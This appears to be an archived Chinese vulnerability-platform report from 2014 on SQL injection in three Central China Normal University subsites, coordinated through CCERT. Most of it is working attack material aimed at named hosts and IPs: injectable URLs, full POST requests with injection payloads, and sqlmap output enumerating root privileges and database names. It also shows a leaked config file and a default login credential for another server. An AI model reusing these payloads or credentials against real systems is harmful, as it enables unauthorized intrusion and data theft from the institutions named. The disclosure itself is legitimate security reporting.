漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:华中师范大学3个分站sql注入打包
提交时间:2014-04-04 11:13
修复时间:2014-05-19 11:14
公开时间:2014-05-19 11:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
Tags标签:
无
漏洞详情 披露状态:
2014-04-04: 细节已通知厂商并且等待厂商处理中 2014-04-06: 厂商已经确认,细节仅向厂商公开 2014-04-16: 细节向核心白帽子及相关领域专家公开 2014-04-26: 细节向普通白帽子公开 2014-05-06: 细节向实习白帽子公开 2014-05-19: 细节向公众公开
简要描述: sql注入,其中一个可拖库、读文件。
详细说明: http://etif2013.ccnu.edu.cn/ SQL注入路径:http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND 8771=8771 AND (6750=6750).shtml 爆路径:http://etif2013.ccnu.edu.cn/Public/Min/builder/ 218.119.196.24 post参数未过滤
POST /resourcecatalogtool-tool/resourcecatalogtool/begin.jsf HTTP/1.1 Host: 218.199.196.24 Proxy-Connection: keep-alive Content-Length: 4104 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://218.199.196.24 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://218.199.196.24/resourceadmin-tool/resourceadmin/user/pgp_user_login.jsf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Cookie: JSESSIONID=49B1A459DF0F6FD4C6123D983E2753B4; JSESSIONID=5551ac5b-472d-45f7-af53-802d20fce70a.localhost; arp_scroll_position=0 _idJsp0%3AuserName=test&_idJsp0%3Apw=a&_idJsp0%3A_idJsp2.x=28&_idJsp0%3A_idJsp2.y=11&_idJsp0_SUBMIT=1&_idJsp0%3A_idcl=&_idJsp0%3A_link_hidden_=&javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAANzcgA6b3JnLmFqYXg0anNmLmFwcGxpY2F0aW9uLkFqYXhTdGF0ZU1hbmFnZXIkVHJlZVN0cnV0dXJlTm9kZYKP75jDZiMJDAAAeHB6AAABnAAjb3JnLmFqYXg0anNmLmNvbXBvbmVudC5BamF4Vmlld1Jvb3QACV92aWV3Um9vdAAAAAAAAAABACNqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sRm9ybQAHX2lkSnNwMAAAAAAAAAAFAChqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRUZXh0AAh1c2VyTmFtZQAAAAAAAAAAACpqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRTZWNyZXQAAnB3AAAAAAAAAAAAKWphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxPdXRwdXRUZXh0AAdfaWRKc3AxAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AyAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AzAAAAAAAAAAB4dXEAfgAAAAAAAnVxAH4AAAAAAAN1cQB%2BAAAAAAACdXEAfgAAAAAABXVxAH4AAAAAAAd0AAlfdmlld1Jvb3RwcHEAfgAJc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAADHcIAAAAEAAAAAB4cHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAgAESQAIaGFzaGNvZGVMAAdjb3VudHJ5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAIbGFuZ3VhZ2VxAH4ADUwAB3ZhcmlhbnRxAH4ADXhw%2F%2F%2F%2F%2F3QAAHQAAnpocQB%2BAA90AApIVE1MX0JBU0lDdAAmL3Jlc291cmNlYWRtaW4vdXNlci9wZ3BfdXNlcl9sb2dpbi5qc3BzcgAOamF2YS5sYW5nLkxvbmc7i%2BSQzI8j3wIAAUoABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAAAAAAB1cQB%2BAAAAAAAFc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc%2Bu4CAAFaAAV2YWx1ZXhwAHEAfgAYcHEAfgAYcQB%2BABhwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAF1cQB%2BAAAAAAADdXEAfgAAAAAAFnVxAH4AAAAAAAd0AAdfaWRKc3AwcHQAEGphdmF4LmZhY2VzLkZvcm1xAH4AHnNxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAnQAMmphdmF4LmZhY2VzLndlYmFwcC5VSUNvbXBvbmVudFRhZy5GT1JNRVJfQ0hJTERfSURTc3IAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAFdAAHX2lkSnNwM3QACHVzZXJOYW1ldAAHX2lkSnNwMXQAAnB3dAAHX2lkSnNwMnh0AAxmb3JjZUlkSW5kZXhzcQB%2BABcBeHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4AGQAAAAV3BAAAAAV1cQB%2BAAAAAAADdXEAfgAAAAAAG3VxAH4AAAAAAAl1cQB%2BAAAAAAADdXEAfgAAAAAAB3EAfgAlcHQAEGphdmF4LmZhY2VzLlRleHR0ABBfaWRKc3AwOnVzZXJOYW1lc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABdAAFdmFsdWVzcgAramF2YXguZmFjZXMuY29tcG9uZW50Ll9BdHRhY2hlZFN0YXRlV3JhcHBlckSr5kB900%2FEAgACTAAGX2NsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMABNfd3JhcHBlZFN0YXRlT2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7eHB2cgAmb3JnLmFwYWNoZS5teWZhY2VzLmVsLlZhbHVlQmluZGluZ0ltcGwAAAAAAAAAAAAAAHhwdAAcI3tSZXNvdXJjZVVzZXJCZWFuLnVzZXJOYW1lfXhwcHBxAH4AGHBwcQB%2BACpwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAUAAAAFHB0AAN0eHRwcHBwdXEAfgAAAAAAA3VxAH4AAAAAABx1cQB%2BAAAAAAAJdXEAfgAAAAAAA3VxAH4AAAAAAAdxAH4AJ3B0ABJqYXZheC5mYWNlcy5TZWNyZXR0AApfaWRKc3AwOnB3c3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABcQB%2BADVzcQB%2BADZxAH4AO3QAFiN7UmVzb3VyY2VVc2VyQmVhbi5wd314cHBwcQB%2BABhwcHEAfgAqcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4APQAAABRwcQB%2BAD9wcHBwdXEAfgAAAAAAA3VxAH4AAAAAAAV1cQB%2BAAAAAAADdXEAfgAAAAAAB3EAfgAmcHEAfgAxdAAPX2lkSnNwMDpfaWRKc3Axc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAN3CAAAAAQAAAACcQB%2BADVzcQB%2BADZxAH4AO3QAGCN7UmVzb3VyY2VVc2VyQmVhbi50aXBzfXQACHJlbmRlcmVkc3EAfgA2cQB%2BADt0AB4je1Jlc291cmNlVXNlckJlYW4udGlwcyE9bnVsbH14cHBwdAAYZm9udC1zaXplOjE0cHg7Y29sb3I6cmVkcHBwcHVxAH4AAAAAAAN1cQB%2BAAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AKHB0ABJqYXZheC5mYWNlcy5CdXR0b250AA9faWRKc3AwOl9pZEpzcDJzcQB%2BAAo%2FQAAAAAAADHcIAAAAEAAAAAFxAH4AKXEAfgAqeHBwc3EAfgA2dnIAJ29yZy5hcGFjaGUubXlmYWNlcy5lbC5NZXRob2RCaW5kaW5nSW1wbAAAAAAAAAAAAAAAeHB1cQB%2BAAAAAAACdAAbI3tSZXNvdXJjZVVzZXJCZWFuLnRvTG9naW59cHBwcHBwcHB0ABwuLi9pbWFnZXMvbG9naW4vbG9naW5faW4uZ2lmcHBwcHBwcHBwcHBwcHBwcHQADGFsaWduOmNlbnRlcnBwcHBwcHVxAH4AAAAAAAN1cQB%2BAAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AJHBxAH4AXXQAD19pZEpzcDA6X2lkSnNwM3NxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAXEAfgApcQB%2BACp4cHBzcQB%2BADZxAH4AYnVxAH4AAAAAAAJ0ACIje1Jlc291cmNlVXNlckJlYW4udG9QYWdlUmVnc2l0ZXJ9cHBwcHBwcHB0AB0uLi9pbWFnZXMvbG9naW4vbG9naW5fcmVnLmdpZnBwcHBwcHBwcHBwcHBwcHBxAH4AZnBwcHBwcHh4cHEAfgAS
218.199.196.243 考试中心 post参数未过滤
POST /scshow.asp HTTP/1.1 Host: 218.199.196.243 Proxy-Connection: keep-alive Content-Length: 102 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://218.199.196.243 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://218.199.196.243/scqry.asp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Cookie: ASPSESSIONIDASBQSRRB=HNBFGCGDHKCMPAECDDCKEHNE; arp_scroll_position=61 dt=201306&lang=%D3%A2%D3%EF&gd=4&kno=2012212306&idn=111111111111111&name=a&B1=%BF%AA%CA%BC%B2%E9%D1%AF
http://218.199.196.109/Huashi/ 被人篡改 http://218.199.196.221 默认用户名、密码:nsroot
漏洞证明: http://etif2013.ccnu.edu.cn/
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: URI Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND 8771=8771 AND (6750=6750).shtml Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND SLEEP(10) AND (6668=6668).shtml --- [01:39:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.2.6 back-end DBMS: MySQL 5
database management system users roles: [*] %root% (administrator) [25]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: UPDATE
<?php $config1 = array( /* 数据库设置 */ 'DB_TYPE' => 'mysql', // 数据库类型 'SHOW_PAGE_TRACE' => FALSE, 'TOKEN_ON' => true, // 是否开启令牌验证 'TOKEN_NAME' => '__hash__', // 令牌验证的表单隐藏字段名称 'TOKEN_TYPE' => 'md5', //令牌哈希验证规则 默认为MD5 'TOKEN_RESET' => FALSE, //令牌验证出错后是否重置令牌 默认为true /* 开发人员相关信息 */ 'AUTHOR_INFO' => array( 'author' => '***马赛克***', 'author_email' => '***马赛克***@qq.com', ), 'DEFAULT_AJAX_RETURN'=>'json', ); $config2 = WEB_ROOT . "Common/systemConfig.php"; $config2 = file_exists($config2) ? include "$config2" : array(); return array_merge($config1, $config2); ?>
218.119.196.24
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: _idJsp0:userName Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _idJsp0:userName='or'a'='a' AND 6607=6607 AND 'VNvy'='VNvy&_idJsp0:pw='or'a'='a&_idJsp0:_idJsp2.x=28&_idJsp0:_idJsp2.y=11&_idJsp0_SUBMIT=1&_idJsp0:_idcl=&_idJsp0:_link_hidden_=&javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAANzcgA6b3JnLmFqYXg0anNmLmFwcGxpY2F0aW9uLkFqYXhTdGF0ZU1hbmFnZXIkVHJlZVN0cnV0dXJlTm9kZYKP75jDZiMJDAAAeHB6AAABnAAjb3JnLmFqYXg0anNmLmNvbXBvbmVudC5BamF4Vmlld1Jvb3QACV92aWV3Um9vdAAAAAAAAAABACNqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sRm9ybQAHX2lkSnNwMAAAAAAAAAAFAChqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRUZXh0AAh1c2VyTmFtZQAAAAAAAAAAACpqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRTZWNyZXQAAnB3AAAAAAAAAAAAKWphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxPdXRwdXRUZXh0AAdfaWRKc3AxAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AyAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AzAAAAAAAAAAB4dXEAfgAAAAAAAnVxAH4AAAAAAAN1cQB+AAAAAAACdXEAfgAAAAAABXVxAH4AAAAAAAd0AAlfdmlld1Jvb3RwcHEAfgAJc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAB4cHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAgAESQAIaGFzaGNvZGVMAAdjb3VudHJ5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAIbGFuZ3VhZ2VxAH4ADUwAB3ZhcmlhbnRxAH4ADXhw/////3QAAHQAAnpocQB+AA90AApIVE1MX0JBU0lDdAAmL3Jlc291cmNlYWRtaW4vdXNlci9wZ3BfdXNlcl9sb2dpbi5qc3BzcgAOamF2YS5sYW5nLkxvbmc7i+SQzI8j3wIAAUoABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAAAAAAB1cQB+AAAAAAAFc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc+u4CAAFaAAV2YWx1ZXhwAHEAfgAYcHEAfgAYcQB+ABhwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAF1cQB+AAAAAAADdXEAfgAAAAAAFnVxAH4AAAAAAAd0AAdfaWRKc3AwcHQAEGphdmF4LmZhY2VzLkZvcm1xAH4AHnNxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAnQAMmphdmF4LmZhY2VzLndlYmFwcC5VSUNvbXBvbmVudFRhZy5GT1JNRVJfQ0hJTERfSURTc3IAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAFdAAHX2lkSnNwM3QACHVzZXJOYW1ldAAHX2lkSnNwMXQAAnB3dAAHX2lkSnNwMnh0AAxmb3JjZUlkSW5kZXhzcQB+ABcBeHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4AGQAAAAV3BAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAG3VxAH4AAAAAAAl1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAlcHQAEGphdmF4LmZhY2VzLlRleHR0ABBfaWRKc3AwOnVzZXJOYW1lc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABdAAFdmFsdWVzcgAramF2YXguZmFjZXMuY29tcG9uZW50Ll9BdHRhY2hlZFN0YXRlV3JhcHBlckSr5kB900/EAgACTAAGX2NsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMABNfd3JhcHBlZFN0YXRlT2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7eHB2cgAmb3JnLmFwYWNoZS5teWZhY2VzLmVsLlZhbHVlQmluZGluZ0ltcGwAAAAAAAAAAAAAAHhwdAAcI3tSZXNvdXJjZVVzZXJCZWFuLnVzZXJOYW1lfXhwcHBxAH4AGHBwcQB+ACpwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAUAAAAFHB0AAN0eHRwcHBwdXEAfgAAAAAAA3VxAH4AAAAAABx1cQB+AAAAAAAJdXEAfgAAAAAAA3VxAH4AAAAAAAdxAH4AJ3B0ABJqYXZheC5mYWNlcy5TZWNyZXR0AApfaWRKc3AwOnB3c3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABcQB+ADVzcQB+ADZxAH4AO3QAFiN7UmVzb3VyY2VVc2VyQmVhbi5wd314cHBwcQB+ABhwcHEAfgAqcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4APQAAABRwcQB+AD9wcHBwdXEAfgAAAAAAA3VxAH4AAAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAmcHEAfgAxdAAPX2lkSnNwMDpfaWRKc3Axc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAN3CAAAAAQAAAACcQB+ADVzcQB+ADZxAH4AO3QAGCN7UmVzb3VyY2VVc2VyQmVhbi50aXBzfXQACHJlbmRlcmVkc3EAfgA2cQB+ADt0AB4je1Jlc291cmNlVXNlckJlYW4udGlwcyE9bnVsbH14cHBwdAAYZm9udC1zaXplOjE0cHg7Y29sb3I6cmVkcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AKHB0ABJqYXZheC5mYWNlcy5CdXR0b250AA9faWRKc3AwOl9pZEpzcDJzcQB+AAo/QAAAAAAADHcIAAAAEAAAAAFxAH4AKXEAfgAqeHBwc3EAfgA2dnIAJ29yZy5hcGFjaGUubXlmYWNlcy5lbC5NZXRob2RCaW5kaW5nSW1wbAAAAAAAAAAAAAAAeHB1cQB+AAAAAAACdAAbI3tSZXNvdXJjZVVzZXJCZWFuLnRvTG9naW59cHBwcHBwcHB0ABwuLi9pbWFnZXMvbG9naW4vbG9naW5faW4uZ2lmcHBwcHBwcHBwcHBwcHBwcHQADGFsaWduOmNlbnRlcnBwcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AJHBxAH4AXXQAD19pZEpzcDA6X2lkSnNwM3NxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAXEAfgApcQB+ACp4cHBzcQB+ADZxAH4AYnVxAH4AAAAAAAJ0ACIje1Jlc291cmNlVXNlckJlYW4udG9QYWdlUmVnc2l0ZXJ9cHBwcHBwcHB0AB0uLi9pbWFnZXMvbG9naW4vbG9naW5fcmVnLmdpZnBwcHBwcHBwcHBwcHBwcHBxAH4AZnBwcHBwcHh4cHEAfgAS ---
218.199.196.243
there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: dt, type: Unescaped numeric (default) [1] place: POST, parameter: name, type: Single quoted string [2] place: POST, parameter: idn, type: Single quoted string [3] place: POST, parameter: kno, type: Single quoted string [q] Quit > 1 [04:15:37] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2000 [04:15:37] [INFO] fetching database names [04:15:37] [INFO] the SQL query used returns 5 entries [04:15:37] [INFO] retrieved: "CETINFO" [04:15:37] [INFO] retrieved: "master" [04:15:37] [INFO] retrieved: "model" [04:15:37] [INFO] retrieved: "msdb" [04:15:37] [INFO] retrieved: "tempdb" available databases [5]: [*] CETINFO [*] master [*] model [*] msdb [*] tempdb
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:6
确认时间:2014-04-06 19:55
厂商回复: 正在通知相关院校处理
最新状态: 暂无